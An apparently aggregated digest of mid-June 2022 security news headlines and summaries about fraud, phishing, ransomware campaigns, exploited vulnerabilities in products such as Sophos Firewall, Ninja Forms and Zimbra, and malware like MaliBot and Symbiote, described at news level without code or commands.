                How financial institutions are improving customer experience with fraud prevention measures

                financial
                2022-06-17 https://www.helpnetsecurity.com/2022/06/17/financial-institutions-fraud/

                Fraud is a persistent threat, and there’s no end in sight as the e-commerce landscape continues to evolve and the use of online payment platforms increases. According to one recent study, e-commerce merchants, consumers and financial service providers lose approximately $6.4 billion to fraud annually. Even worse: Losses from false declines are estimated at $443 billion—almost 70 times greater than losses from fraud—each year. Customers expect their accounts and transactions to be secure, but an … More

                The post How financial institutions are improving customer experience with fraud prevention measures appeared first on Help Net Security.


                Autosummary: By leveraging a wide range of digital identity markers in the background—such as location, IP address, device-specific data—and assessing the connections between customers’ online and offline identities and their typical behaviors, organizations can gain confidence in their authentication processes without introducing overt, disruptive speed bumps for customers. Leveraging data insights in practice: Various institutions are already using a host of online, offline, and device-based elements to corroborate an existing customer’s digital information or a prospective customer’s application, and they are reaping clear benefits.


                Cyber criminals continue to target and exploit people

                exploits ransomware
                2022-06-17 https://www.helpnetsecurity.com/2022/06/17/user-risk/

                Proofpoint unveiled its annual Human Factor report, which provides a comprehensive examination of the three main facets of user risk — vulnerability, attacks, and privilege — and how threat actors continue their ceaseless creativity as they exploit the many opportunities presented by people. The report dives deep into user risk, drawing on data and insight from a year’s worth of research, covering threats detected, mitigated, and resolved across one of the largest datasets in cybersecurity. … More

                The post Cyber criminals continue to target and exploit people appeared first on Help Net Security.



                Fraud trends and scam tactics consumers should be aware of

                financial
                2022-06-17 https://www.helpnetsecurity.com/2022/06/17/consumers-scam-text/

                If it seems like you’re receiving more spam than normal, you probably are. Seventy-four percent of consumers say they have received a scam text so far this year, while as many as 83% have received a scam phone call, according to Allstate Identity Protection’s (AIP) first quarter Identity Fraud in Focus report. Of those, nearly half report receiving 11 or more spam attempts via text or call every week. Although even successful scams sometimes fail … More

                The post Fraud trends and scam tactics consumers should be aware of appeared first on Help Net Security.



                QNAP "thoroughly investigating" new DeadBolt ransomware attacks

                exploits ransomware
                2022-06-17 https://www.bleepingcomputer.com/news/security/qnap-thoroughly-investigating-new-deadbolt-ransomware-attacks/
                Network-attached storage (NAS) vendor QNAP once again warned customers on Friday to secure their devices against a new campaign of attacks pushing DeadBolt ransomware. [...]

                Autosummary: DeadBolt ransomware: As seen during previous attacks targeting QNAP NAS devices in late January and hitting thousands of victims, DeadBolt ransomware hijacks the device's login page to display a screen stating "WARNING: [...]"


                Heineken giving away free beer for Father’s Day? It’s a WhatsApp scam

                financial
                2022-06-17 https://www.bitdefender.com/blog/hotforsecurity/heineken-giving-away-free-beer-for-fathers-day-its-a-whatsapp-scam/
                With Father's Day falling this weekend in the United States and UK, more people might be more willing than normal to believe the latest scam to be spreading via WhatsApp is true. But I'm afraid it isn't. Sorry dads, Heineken isn't giving away free coolers of beer. Read more in my article on the Hot for Security blog.

                Autosummary: The truth is, however, that the scam is using the lure to trick users into entering their names, email addresses, and phone numbers into a website - with the intention, no doubt, of being later exploited by fraudsters.


                Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity

                exploits
                2022-06-17 https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html
                A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks

                Autosummary: Now according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.


                Over a Million WordPress Sites Forcibly Updated to Patch a Critical Plugin Vulnerability

                exploits
                2022-06-17 https://thehackernews.com/2022/06/over-million-wordpress-sites-forcibly.html
                WordPress websites using a widely used plugin named Ninja Forms have been updated automatically to remediate a critical security vulnerability that's suspected of having been actively exploited in the wild. The issue, which relates to a case of code injection, is rated 9.8 out of 10 for severity and affects multiple versions starting from 3.0. It has been fixed in 3.0.34.2, 3.1.10, 3.2.28,



                QNAP warns of new DeadBolt ransomware attack locking up NAS devices

                exploits ransomware
                2022-06-17 https://www.bitdefender.com/blog/hotforsecurity/qnap-warns-of-new-deadbolt-ransomware-attack-locking-up-nas-devices/
                Owners of NAS drives manufactured by QNAP have been advised that the company is "thoroughly investigating" reports that a new variant of the DeadBolt ransomware is targeting devices, locking up data and demanding victims pay a fee to extortionists. Read more in my article on the Hot for Security blog.



                NinjaForms WordPress plugin, actively exploited in wild, receives forced security update

                exploits
                2022-06-17 https://grahamcluley.com/ninjaforms-wordpress-plugin-actively-exploited-in-wild-receives-forced-security-update/
                A critical vulnerability in a WordPress plugin used on over one million websites has been patched, after evidence emerged that malicious hackers were actively exploiting it in the wild.



                Which stolen data are ransomware gangs most likely to disclose?

                exploits ransomware
                2022-06-17 https://www.helpnetsecurity.com/2022/06/17/ransomware-data-disclosed/

                If your organization gets hit by a ransomware gang that has also managed to steal company data before hitting the “encrypt” button, which types of data are more likely to end up being disclosed as you debate internally on whether you should pay the ransomware gang off? Rapid7 analysts analyzed 161 data disclosures performed by ransomware gangs using the double extortion approach between April 2020 and February 2022, and found that: The most commonly leaked … More

                The post Which stolen data are ransomware gangs most likely to disclose? appeared first on Help Net Security.


                Autosummary: Files containing intellectual property (e.g., trade secrets, research data, etc.) are rarely disclosed (12%) by ransomware gangs, but if the organization is part of the pharmaceutical industry, the risk of IP data being disclosed is considerably higher (43%), “likely due to the high value placed on research and development within this industry.”


                Cisco says it won’t fix zero-day RCE in end-of-life VPN routers

                exploits
                2022-06-17 https://www.bleepingcomputer.com/news/security/cisco-says-it-won-t-fix-zero-day-rce-in-end-of-life-vpn-routers/
                Cisco advises owners of end-of-life Small Business RV routers to upgrade to newer models after disclosing a remote code execution vulnerability that will not be patched. [...]



                The Week in Ransomware - June 17th 2022 - Have I Been Ransomed?

                exploits ransomware
                2022-06-17 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-17th-2022-have-i-been-ransomed/
                Ransomware operations are constantly evolving their tactics to pressure victims to pay. For example, this week, we saw a new extortion tactic come into play with the creation of dedicated websites to extort victims with searchable data. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @jorntvdw, @malwareforme, @VK_Intel, @struppigel, @DanielGallagher, @PolarToffee, @LawrenceAbrams, @Ionut_Ilascu, @fwosar, @billtoulas, @BleepinComputer, @Seifreed, @malwrhunterteam, @FourOctets, @demonslay335, @pcrisk, @proofpoint, @PogoWasRight, @BrettCallow, @Unit42_Intel, and @Amigo_A_.


                Chinese DriftingCloud APT exploited Sophos Firewall Zero-Day before it was fixed

                exploits
                2022-06-17 https://securityaffairs.co/wordpress/132377/apt/chinese-driftingcloud-apt-exploited-sophos-firewall-zero-day-before-it-was-fixed.html

                China-linked threat actors exploited the zero-day flaw CVE-2022-1040 in Sophos Firewall weeks before it was fixed by the security vendor. Volexity researchers discovered that the zero-day vulnerability, tracked as CVE-2022-1040, in Sophos Firewall was exploited by Chinese threat actors to compromise a company and cloud-hosted web servers it was operating. The vulnerability was exploited by […]

                The post Chinese DriftingCloud APT exploited Sophos Firewall Zero-Day before it was fixed appeared first on Security Affairs.



                MaliBot: A New Android Banking Trojan Spotted in the Wild

                financial exploits
                2022-06-16 https://thehackernews.com/2022/06/malibot-new-android-banking-trojan.html
                A new strain of Android malware has been spotted in the wild targeting online banking and cryptocurrency wallet customers in Spain and Italy, just weeks after a coordinated law enforcement operation dismantled FluBot. The information stealing trojan, codenamed MaliBot by F5 Labs, is as feature-rich as its counterparts, allowing it to steal credentials and cookies, bypass multi-factor



                Microsoft Office 365 feature can help cloud ransomware attacks

                exploits ransomware
                2022-06-16 https://www.bleepingcomputer.com/news/security/microsoft-office-365-feature-can-help-cloud-ransomware-attacks/
                Security researchers are warning that threat actors could hijack Office 365 accounts to encrypt for a ransom the files stored in SharePoint and OneDrive services that companies use for cloud-based collaboration, document management and storage. [...]

                Autosummary: Versioning setting on document lists (Microsoft). With a file version limit set to “1,” when the attacker encrypts or edits the file twice, the original document will no longer be available through OneDrive and cannot be restored.


                High-Severity RCE Vulnerability Reported in Popular Fastjson Library

                exploits
                2022-06-16 https://thehackernews.com/2022/06/high-severity-rce-vulnerability.html
                Cybersecurity researchers have detailed a recently patched high-severity security vulnerability in the popular Fastjson library that could be potentially exploited to achieve remote code execution. Tracked as CVE-2022-25845 (CVSS score: 8.1), the issue relates to a case of deserialization of untrusted data in a supported feature called "AutoType." It was patched by the project maintainers in



                Malicious apps continue to spread through the Google Play Store

                ransomware
                2022-06-16 https://securityaffairs.co/wordpress/132305/malware/malware-google-play-store.html

                Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that was downloaded two million times. An investigation conducted by the antivirus firm Dr. Web in May resulted in the discovery of multiple adware and information-stealing malware on the official Google Play Store. However, the experts warn that info-stealing Trojans are the […]

                The post Malicious apps continue to spread through the Google Play Store appeared first on Security Affairs.



                BlackCat Ransomware Gang Targeting Unpatched Microsoft Exchange Servers

                exploits ransomware
                2022-06-16 https://thehackernews.com/2022/06/blackcat-ransomware-gang-targeting.html
                Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks. Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, followed by carrying out credential theft and lateral movement activities, before harvesting intellectual property and



                A Microsoft Office 365 Feature Could Help Ransomware Hackers Hold Cloud Files Hostage

                exploits ransomware
                2022-06-16 https://thehackernews.com/2022/06/a-microsoft-office-365-feature-could.html
                A "dangerous piece of functionality" has been discovered in Microsoft 365 suite that could be potentially abused by a malicious actor to ransom files stored on SharePoint and OneDrive and launch attacks on cloud infrastructure. The cloud ransomware attack makes it possible to launch file-encrypting malware to "encrypt files stored on SharePoint and OneDrive in a way that makes them unrecoverable

                Autosummary: To mitigate such attacks, it's recommended to enforce a strong password policy, mandate multi-factor authentication (MFA), prevent large-scale data downloads to unmanaged devices, and maintain periodic external backups of cloud files with sensitive data.


                Difference Between Agent-Based and Network-Based Internal Vulnerability Scanning

                exploits
                2022-06-16 https://thehackernews.com/2022/06/difference-between-agent-based-and.html
                For years, the two most popular methods for internal scanning, agent-based and network-based, were considered to be about equal in value, each bringing its own strengths to bear. However, with remote working now the norm in most if not all workplaces, it feels a lot more like agent-based scanning is a must, while network-based scanning is an optional extra. This article will go in-depth on the

                Autosummary: Network-based scanning explained: Network-based internal vulnerability scanning is the more traditional approach, running internal network scans on a box known as a scanning "appliance" that sits on your infrastructure (or, more recently, on a Virtual Machine in your internal cloud). The different types of internal scanner: Generally, when it comes to identifying and fixing vulnerabilities on your internal network, there are two competing (but not mutually exclusive) approaches: network-based internal vulnerability scanning and agent-based internal vulnerability scanning. In environments where IP addresses are assigned dynamically, though (usually, end-user environments are configured like this to support laptops, desktops, and other devices), this can become a problem. Agent-based vulnerability scanning, on the other hand, spreads the load to individual machines, meaning there's less of a bottleneck on the network, and results can be gained much more quickly. For this reason, designing a network-based scanning architecture relies on accurate network documentation and understanding, which is often a challenge, even for well-resourced organizations. Deploying network-based appliances on the other hand requires analysis of network visibility, i.e. from "this" position in the network, can we "see" everything else in the network, so the scanner can scan everything?


                State-Sponsored Phishing Attack Targeted Israeli Military Officials

                financial government
                2022-06-16 https://threatpost.com/phishing-attack-israeli-officials/179987/
                Analysts have uncovered an Iran-linked APT sending malicious emails to top Israeli government officials.

                Autosummary: “The goal,” in the end, was “to steal their personal information, passport scans, and steal access to their mail accounts.” Fake Emails from Legit Addresses: One of the targets, according to Check Point, is Tzipi Livni, Israel’s former foreign minister, minister of justice and vice prime minister.


                Ransomware Risk in Healthcare Endangers Patients

                exploits
                2022-06-16 https://threatpost.com/ransomware-risk-healthcare/179980/
                Ryan Witt, Proofpoint's Healthcare Cybersecurity Leader, examines the impact of ransomware on patient care.

                Autosummary: The New York Times quoted one nurse as saying, “To look someone in the eye, and tell them they cannot have their life-extending or lifesaving treatment, it was horrible, and totally heart-wrenching.” The complexities of the environment, with connected medical devices, multiple locations, and legacy systems, create many challenges. Rethinking the Importance of Cybersecurity: ECRI, a nonprofit focused on patient safety, named cybersecurity attacks the top health technology hazard (PDF) for 2022.


                Facebook Messenger Scam Duped Millions

                financial
                2022-06-16 https://threatpost.com/acebook-messenger-scam/179977/
                One well-crafted phishing message sent via Facebook Messenger ensnared 10 million Facebook users and counting.

                Autosummary: Then, “in a likely automated fashion,” the authors of the report explained, “the threat actor would login to that account, and send out the link to the user’s Friends via Facebook Messenger.” Even if Facebook caught on to and blocked any one of these illegitimate domains, “it was trivial (and based on the speed we observed, likely automated) to spin up a new link using the same service, with a new unique ID.”


                Interpol arrests thousands of scammers in operation “First Light 2022”

                financial
                2022-06-16 https://www.tripwire.com/state-of-security/latest-security-news/interpol-arrests-thousands-scammers-operation-first-light-2022/
                Law enforcement agencies around the world appear to have scored a major victory in the fight against fraudsters, in an operation which has seized tens of millions of dollars and seen more than 2000 people arrested. Read more in my article on the Tripwire State of Security blog.



                ALPHV/BlackCat ransomware gang starts publishing victims’ data on the clear web

                exploits
                2022-06-16 https://securityaffairs.co/wordpress/132339/malware/blackcat-ransomware-clear-web.html

                ALPHV/BlackCat ransomware group began publishing victims’ data on the clear web to increase the pressure on them and force them to pay the ransom. ALPHV/BlackCat ransomware group has adopted a new strategy to force victims into paying the ransom, the gang began publishing victims’ data on the clear web to increase the pressure. Publishing data online will […]

                The post ALPHV/BlackCat ransomware gang starts publishing victims’ data on the clear web appeared first on Security Affairs.



                Sophos Firewall zero-day bug exploited weeks before fix

                exploits
                2022-06-16 https://www.bleepingcomputer.com/news/security/sophos-firewall-zero-day-bug-exploited-weeks-before-fix/
                Chinese hackers used a zero-day exploit for a critical-severity vulnerability in Sophos Firewall to compromise a company and breach cloud-hosted web servers operated by the victim. [...]

                Autosummary: Creating VPN user accounts and associating certificate pairs on the firewall for legitimate remote network access; writing “pre_install.sh” to ‘/conf/certificate/’ (“pre_install.sh” runs a malicious command to download a binary, execute it, then delete it from the disk). The researchers say that gaining access to Sophos Firewall was the first step of the attack, allowing the adversary to perform man-in-the-middle (MitM) activity by way of modifying DNS responses for specific websites managed by the victim company.


                New MaliBot Android banking malware spreads as a crypto miner

                financial exploits
                2022-06-16 https://www.bleepingcomputer.com/news/security/new-malibot-android-banking-malware-spreads-as-a-crypto-miner/
                Threat analysts have discovered a new Android malware strain named MaliBot, which poses as a cryptocurrency mining app or the Chrome web browser to target users in Italy and Spain. [...]

                Autosummary: VNC allows the operators to navigate between screens, scroll, take screenshots, copy and paste content, swipe, perform long presses, and more.


                730K WordPress sites force-updated to patch critical plugin bug

                exploits
                2022-06-16 https://www.bleepingcomputer.com/news/security/730k-wordpress-sites-force-updated-to-patch-critical-plugin-bug/
                WordPress sites using Ninja Forms, a forms builder plugin with more than 1 million installations, have been force-updated en masse this week to a new build that addresses a critical security vulnerability likely exploited in the wild. [...]

                Autosummary: Ninja Forms force-update installs. Forced updates used to patch critical bugs: This matches previous instances when Automattic, the company behind the WordPress content management system, used forced updates to quickly patch critical security flaws used by hundreds of thousands or millions of sites.


                BlackCat Ransomware affiliates target unpatched Microsoft Exchange servers

                exploits ransomware
                2022-06-16 https://securityaffairs.co/wordpress/132343/hacking/blackcat-ransomware-targets-unpatched-microsoft-exchange.html

                The BlackCat ransomware gang is targeting unpatched Exchange servers to compromise target networks, Microsoft warns. Microsoft researchers have observed BlackCat ransomware gang targeting unpatched Exchange servers to compromise organizations worldwide. The compromise of Exchange servers allows threat actors to access the target networks, perform internal reconnaissance and lateral movement activities, and steal sensitive documents before encrypting them. “For example, […]

                The post BlackCat Ransomware affiliates target unpatched Microsoft Exchange servers appeared first on Security Affairs.


                Autosummary: In addition, at least two known affiliates are now adopting BlackCat: DEV-0237 (known for previously deploying Ryuk, Conti, and Hive) and DEV-0504 (previously deployed Ryuk, REvil, BlackMatter, and Conti).” “For discovered devices, the attackers attempted to navigate to various network shares and used the Remote Desktop client (mstsc.exe) to sign into these devices, once again using the compromised account credentials,” continues the analysis.


                How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security

                industry
                2022-06-16 https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/

                Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents?

                The post How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security appeared first on WeLiveSecurity

                Autosummary: Recognizing this potential abuse of macros, during the heyday of Word 97 Microsoft introduced the first built-in security feature in Word that blocked Visual Basic for Applications (VBA) macros from running. This feature continued to be developed in later versions of Office, now probably most familiar via the yellow Message Bar with the “Enable Content” button introduced in Office 2010. Since then, two clicks have been typically required to enable macros: first, clicking on “Enable Editing”, which removes the document from Protected View, a security feature in place since Office 2010 that provides a read-only, sandboxed environment; second, clicking on “Enable Content”, which allows the macros to run. Specifically, Guildma stored all of its malicious modules, including a couple of tools from Nirsoft for extracting saved credentials from popular email clients and web browsers, as the streams of the single desktop.ini file: desktop.ini:nauwuygiaa.jpg (MailPassView), desktop.ini:nauwuygiab.jpg (BrowserPassView)… For targeting air-gapped networks, malicious actors have used streams to hide malicious components within otherwise innocuous-looking files on USB drives. When double-clicked, a shortcut file can launch a target resource, in this case, a PowerShell script that downloaded and executed Emotet. Most detections were in Japan (28%), Italy (16%), and Mexico (11%). In an earlier test campaign between April 4th and April 19th, the Emotet operators attracted victims to a ZIP archive, stored on OneDrive, containing Microsoft Excel Add-in (XLL) files, which are used to add custom functions to Excel. Zone.Identifier is a well-known stream name that modern browsers and some other applications automatically add or propagate to files to indicate their zone: the internet, the intranet, the trusted zone, the restricted zone, or the local machine.


                Mind the gap: How to ensure your vulnerability detection methods are up to scratch

                exploits
                2022-06-15 https://www.helpnetsecurity.com/2022/06/15/vulnerability-detection-methods/

                With global cyber crime costs expected to reach $10.5 trillion annually by 2025, it comes as little surprise that the risk of attack is companies’ biggest concern globally. To help businesses uncover and fix the vulnerabilities and misconfigurations affecting their systems, there is an (over)abundance of solutions available. But beware, they may not give you a full and continuous view of your weaknesses if used in isolation. With huge financial gains to be had from … More

                The post Mind the gap: How to ensure your vulnerability detection methods are up to scratch appeared first on Help Net Security.

                Autosummary: Fortunately, some solutions – such as Intruder Vanguard – take a faster, more proactive approach, finding the proof-of-concept exploit, breaking it down, and then checking all its customers – often before the scanning vendors have started their checks. To avoid this, you need a solution which takes into account your specific environment, i.e. the types of systems you have deployed, the configuration of these systems, the data stored within them, and the mitigating controls you have in place.


                Phishing reaches all-time high in early 2022

                financial
                2022-06-15 https://www.helpnetsecurity.com/2022/06/15/2022-total-phishing-attacks/

                The APWG’s Phishing Activity Trends Report reveals that in the first quarter of 2022 there were 1,025,968 total phishing attacks—the worst quarter for phishing observed to date. This quarter was the first time the three-month total has exceeded one million. There were 384,291 attacks in March 2022, which was a record monthly total. In the first quarter of 2022, OpSec Security reported that phishing attacks against the financial sector, which includes banks, remained the largest … More

                The post Phishing reaches all-time high in early 2022 appeared first on Help Net Security.

                Autosummary: In the first quarter of 2022, OpSec Security reported that phishing attacks against the financial sector, which includes banks, remained the largest set of attacks, accounting for 23.6 percent of all phishing.


                Patch Tuesday: Microsoft Issues Fix for Actively Exploited "Follina" Vulnerability

                exploits
                2022-06-15 https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html
                Microsoft officially released fixes to address an actively exploited Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates. Also addressed by the tech giant are 55 other flaws, three of which are rated Critical, 51 are rated Important, and one is rated Moderate in severity. Separately, five other shortcomings were resolved in the Microsoft Edge browser.

                Autosummary: Besides CVE-2022-30190, the cumulative security update also resolves several remote code execution flaws in Windows Network File System (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC Video Extensions, and Azure RTOS GUIX Studio.


                Email compromise leads to healthcare data breach at Kaiser Permanente

                financial
                2022-06-15 https://blog.malwarebytes.com/cybercrime/2022/06/email-compromise-leads-to-healthcare-data-breach-at-kaiser-permanente/

                We take a look at the latest healthcare breach, an email compromise of a healthcare employee and explore the fallout.

                The post Email compromise leads to healthcare data breach at Kaiser Permanente appeared first on Malwarebytes Labs.

                Autosummary: Data exposed includes first and last name of patients, dates of service, medical records, and lab test result information. The attacker did not have access to credit card details and social security numbers. Healthcare attacks: big business for fraudsters. This certainly isn’t the only healthcare breach in the news, with fresh attacks and even multiple breaches at some unfortunate organisations.


                Ransomware gang publishes stolen victim data on the public Internet

                exploits
                2022-06-15 https://www.helpnetsecurity.com/2022/06/15/ransomware-victim-data-internet/

                The Alphv (aka BlackCat) ransomware group is trying out a new tactic to push companies to pay for their post-breach silence: a clearnet (public Internet) website with sensitive data about the employees and customers stolen from a victim organization. Alphv has created a @haveibeenpwned-like site on the clearnet where the employees and customers of a victim organization can check if their personal info. has been compromised. 1/3 pic.twitter.com/95BWwRPvhD — Brett Callow (@BrettCallow) June 14, 2022 … More

                The post Ransomware gang publishes stolen victim data on the public Internet appeared first on Help Net Security.

                Autosummary: For employees, these can include information such as email and phone number, Social Security number, date of birth and other sensitive information contained in tax forms, results of medical tests and background checks, and so on.


                Citrix warns critical bug can let attackers reset admin passwords

                exploits
                2022-06-15 https://www.bleepingcomputer.com/news/security/citrix-warns-critical-bug-can-let-attackers-reset-admin-passwords/
                Citrix warned customers to deploy security updates that address a critical Citrix Application Delivery Management (ADM) vulnerability that can let attackers reset admin passwords. [...]



                Cisco Secure Email bug can let attackers bypass authentication

                exploits
                2022-06-15 https://www.bleepingcomputer.com/news/security/cisco-secure-email-bug-can-let-attackers-bypass-authentication/
                Cisco notified customers this week to patch a critical vulnerability that could allow attackers to bypass authentication and log into the web management interface of Cisco email gateway appliances with non-default configurations. [...]



                Zimbra bug allows stealing email logins with no user interaction

                exploits
                2022-06-15 https://www.bleepingcomputer.com/news/security/zimbra-bug-allows-stealing-email-logins-with-no-user-interaction/
                Zimbra and SonarSource proceeded to the coordinated disclosure of a high-severity vulnerability that allows unauthenticated attackers to steal cleartext credentials from Zimbra without any user interaction. [...]

                Autosummary: HTTP request (above) and message sent to server (below) (SonarSource). “Usually, Mail clients such as Thunderbird, Microsoft Outlook, the macOS Mail app, and Smartphone mail apps store the credentials that the user used to connect to their IMAP server on disk,” explains SonarSource in the report, highlighting that the exploit doesn’t require any user interaction.


                Stealthy Symbiote Linux malware is after financial institutions

                financial exploits
                2022-06-15 https://blog.malwarebytes.com/reports/2022/06/stealthy-symbiote-linux-malware-is-after-financial-institutions/

                Symbiote, the latest malware to hit Linux users, is a parasite more than anything. Protect against this banking credential stealer now!

                The post Stealthy Symbiote Linux malware is after financial institutions appeared first on Malwarebytes Labs.

                Autosummary: Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.” Symbiote’s evasion techniques (Source: Blackberry Threat Vector Blog). Symbiote: the hows and whys of its ways. Once all processes have been infected, the Linux machine is as good as being infected.


                Hackers exploit three-year-old Telerik flaws to deploy Cobalt Strike

                exploits
                2022-06-15 https://www.bleepingcomputer.com/news/security/hackers-exploit-three-year-old-telerik-flaws-to-deploy-cobalt-strike/
                The threat actor known as "Blue Mockingbird" has been observed by analysts targeting Telerik UI vulnerabilities to compromise servers, install Cobalt Strike beacons, and mine Monero by hijacking system resources. [...]

                Autosummary: XMRig configuration (Sophos). XMRig mining attributed to Blue Mockingbird (Sophos). Notably, this was the main goal of the threat actor’s 2020 campaign, so not much has changed in the whole attack chain, techniques, and goals.


                Why do organizations need to prioritize ransomware preparedness?

                exploits ransomware
                2022-06-14 https://www.helpnetsecurity.com/2022/06/14/reported-ransomware-attack/

                Hitachi Vantara and Enterprise Strategy Group (ESG) announced the findings of a survey of more than 600 IT and cybersecurity professionals, which revealed that 79% of respondents reported a ransomware attack at their company within the last year. More troubling for organizations is the degree to which these attacks are successful. The survey found that 73% report that they have been financially or operationally impacted by these attacks. As noted in the report, “Every lost bit … More

                The post Why do organizations need to prioritize ransomware preparedness? appeared first on Help Net Security.



                Don’t panic! “Unpatchable” Mac vulnerability discovered

                exploits
                2022-06-14 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/dont-panic-unpatchable-mac-vulnerability-discovered/

                Researchers at MIT have published details about an attack that uses a flaw in the M1 security feature pointer authentication codes.

                The post Don’t panic! “Unpatchable” Mac vulnerability discovered appeared first on Malwarebytes Labs.

                Autosummary: Apple has implemented pointer authentication on all of its custom ARM-based silicon so far, including the M1, M1 Pro and M1 Max, and a number of other chip manufacturers, including Qualcomm and Samsung, have either announced or expect to ship new processors supporting the PAC security feature. The Apple M1 series of ARM-based system-on-a-chip (SoC) works as a central processing unit (CPU) and graphics processing unit (GPU) for Apple’s Macintosh desktops and notebooks, as well as the iPad Pro and iPad Air tablets.


                Once is never enough: The need for continuous penetration testing

                ransomware
                2022-06-14 https://www.helpnetsecurity.com/2022/06/14/need-for-continuous-penetration-testing/

                If you Google “How often should I do penetration testing?”, the first answer that pops up is “once a year.” Indeed, even industry-leading standards like PCI-DSS dictate that external penetration testing be conducted annually (or after significant changes to infrastructure or applications), while internal penetration testing takes place annually, with segmentation testing occurring every six months. Yet today’s cybercriminals don’t work on annual schedules. They don’t wait until pen testing time rolls around and the … More

                The post Once is never enough: The need for continuous penetration testing appeared first on Help Net Security.

                Autosummary: Indeed, even industry-leading standards like PCI-DSS dictate that external penetration testing be conducted annually (or after significant changes to infrastructure or applications), while internal penetration testing takes place annually, with segmentation testing occurring every six months. When a new API is connected, a new server added, or a new version released – that snapshot is no longer valid, even if the next round of pen testing is a year away.


                Unpatched Travis CI API Bug Exposes Thousands of Secret User Access Tokens

                exploits
                2022-06-14 https://thehackernews.com/2022/06/unpatched-travis-ci-api-bug-exposes.html
                An unpatched security issue in the Travis CI API has left tens of thousands of developers’ user tokens exposed to potential attacks, effectively allowing threat actors to breach cloud infrastructures, make unauthorized code changes, and initiate supply chain attacks. "More than 770 million logs of free tier users are available, from which you can easily extract tokens, secrets, and other [...]



                Researchers Detail PureCrypter Loader Cyber Criminals Using to Distribute Malware

                exploits
                2022-06-14 https://thehackernews.com/2022/06/researchers-detail-purecrypter-loader.html
                Cybersecurity researchers have detailed the workings of a fully-featured malware loader dubbed PureCrypter that’s being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers. "The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption, and obfuscation to evade antivirus software products," Zscaler’s Romain Dumont [...]



                “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft

                exploits
                2022-06-14 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/

                Microsoft has warned of APT groups and ransomware authors exploiting the now patched Confluence vulnerability. We take a look at the dangers.

                The post “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft appeared first on Malwarebytes Labs.

                Autosummary: We urge customers to upgrade to the latest version or apply recommended mitigations: https://t.co/C3CykQgrOJ — Microsoft Security Intelligence (@MsftSecIntel) June 11, 2022 Microsoft continues: In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware. On June 3, Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.


                Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs)

                exploits
                2022-06-14 https://blog.malwarebytes.com/malwarebytes-news/2022/06/introducing-malwarebytes-vulnerability-assessment-for-oneview-how-to-check-for-common-vulnerabilities-and-exposures-cves/

                In this post, we’ll give you a step-by-step on how to complete an Inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView.

                The post Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs) appeared first on Malwarebytes Labs.

                Autosummary: Here are some key benefits: automatically identify vulnerabilities via scheduled or manual scans; deliver key insights and remediation steps for vulnerabilities, prioritized by severity level; stay informed with customizable notifications when new vulnerabilities are discovered; detailed vulnerability dashboards for a high-level view of all your customers. In this post, we’ll give you a step-by-step on how to complete an inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView.


                Technical Details Released for "SynLapse" RCE Vulnerability Reported in Microsoft Azure

                exploits
                2022-06-14 https://thehackernews.com/2022/06/technical-details-released-for-synlapse.html
                Microsoft has incorporated additional improvements to address the recently disclosed SynLapse security vulnerability in order to meet comprehensive tenant isolation requirements in Azure Data Factory and Azure Synapse Pipelines. The latest safeguards include moving the shared integration runtimes to sandboxed ephemeral instances and using scoped tokens to prevent adversaries from using a client [...]



                Kaiser Permanente Exposes Nearly 70K Medical Records in Data Breach

                financial
                2022-06-14 https://threatpost.com/kaiser-permanente-breach/179949/
                Attackers gained access to private account details through an email compromise incident that occurred in April.

                Autosummary: “Whether it is the use of stolen credentials, phishing, misuse, or simply an error, people continue to play a very large role in incidents and breaches alike,” researchers wrote in the report.


                Linux Malware Deemed ‘Nearly Impossible’ to Detect

                exploits
                2022-06-14 https://threatpost.com/linux-malware-impossible-detect/179944/
                Symbiote, discovered in November, parasitically infects running processes so it can steal credentials, gain rootkit functionality and install a backdoor for remote access.

                Autosummary: Once Symbiote has infected all the running processes, a threat actor can engage in various nefarious activity, including rootkit functionality, the ability to harvest credentials, and remote access capability, Kennedy said. To gain remote access to an infected machine, the malware hooks a few Linux Pluggable Authentication Module (PAM) functions, which allows it to authenticate to the machine with any service that uses PAM—including remote services such as Secure Shell (SSH), Kennedy said.


